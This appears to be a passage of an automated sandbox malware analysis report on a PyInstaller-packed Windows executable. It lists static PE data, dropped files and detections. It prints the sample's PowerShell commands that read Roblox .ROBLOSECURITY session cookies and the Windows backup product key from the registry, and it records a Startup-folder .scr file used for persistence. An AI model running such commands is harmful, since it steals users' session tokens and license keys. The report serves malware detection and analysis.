              Source: 9g9LZNE4bH.exeStatic file information: File size 7186035 > 1048576
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 9g9LZNE4bH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: 9g9LZNE4bH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2405833236.00007FF8A8450000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: 9g9LZNE4bH.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000046.00000000.2310221598.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8CCC000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410652961.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409933422.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408813480.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410441345.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdbhPV source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410254689.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409190880.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409408125.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A8731000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdb source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2409000197.00007FF8B7E21000.00000040.00000001.01000000.0000000E.sdmp
              Source: 9g9LZNE4bH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 9g9LZNE4bH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 9g9LZNE4bH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 9g9LZNE4bH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 9g9LZNE4bH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x117bde
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x169d3
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4c48e
              Source: 3lfchnc2.dll.43.drStatic PE information: real checksum: 0x0 should be: 0x318a
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x10b2e
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xb515
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1e77b
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9d35e
              Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x3e84b
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1592c
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xc215
              Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1ad857
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x20a78
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xa303
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x138cb
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23fb5
              Source: 9g9LZNE4bH.exeStatic PE information: real checksum: 0x6dbf4b should be: 0x6e2df3
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x19f80
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8474DD2A5 pushad ; iretd 7_2_00007FF8474DD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8475F841D push ebx; retn 0009h7_2_00007FF8475F841A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8475F83D5 push ebx; retn 0009h7_2_00007FF8475F841A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Found pyInstaller with non standard icon
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA576B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF78DA576B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
